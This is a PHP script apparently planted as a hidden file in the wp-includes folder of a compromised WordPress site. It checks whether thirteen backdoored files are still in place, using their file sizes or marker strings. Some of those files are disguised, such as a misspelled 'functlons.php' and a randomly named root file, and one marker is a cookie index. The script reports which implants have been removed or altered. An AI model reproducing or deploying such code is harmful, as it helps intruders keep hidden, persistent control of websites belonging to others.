File: /home/ricpug/tecnomarketconsult.co/wp-includes/.dba_insertion
<?php $r = '/home/ricpug/tecnomarketconsult.co'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php"=>"bd@@119890@@core_engine",
"/wp-includes/SimplePie/library/SimplePie/Enclosure.php"=>"bd@@357675@@If-Unmodified-Since",
"/wp-content/themes/twentytwentyfour/patterns/hidden-post-meta.php"=>"bd@@405810@@publish_content",
"/wp-content/themes/twentytwentytwo/inc/patterns/page-about-large-image-and-buttons.php"=>"bd@@369214@@Authorization",
"/wp-content/plugins/js_composer_theme/include/params/href/href.php"=>"bd@@207204@@Clear-Site-Data",
"/wp-content/themes/category-template-1748020320/functlons.php"=>"bd@@261225@@727",
"/wp-content/themes/twentytwentyfive/patterns/grid-videos.php"=>"bd@@377968@@If-Modified-Since",
"/wp-content/plugins/social-media-feather/build/index.asset.php"=>"bd@@411535@@_COOKIE[3]",
"/wp-includes/class-wp-metadata-lazyloader.php"=>"bd@@385208@@event_handler",
"/9c88f6.php"=>"bd@@73672@@105",
"/wp-content/themes/twentythirteen/content-quote.php"=>"bd@@411338@@publish_content",
"/wp-includes/script-loader.php"=>"bd@@207579@@config_manager",
"/wp-content/themes/ananke/framework/Custom-Metaboxes/metabox-functions.php"=>"bd@@313326@@Sec-Websocket-Accept"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');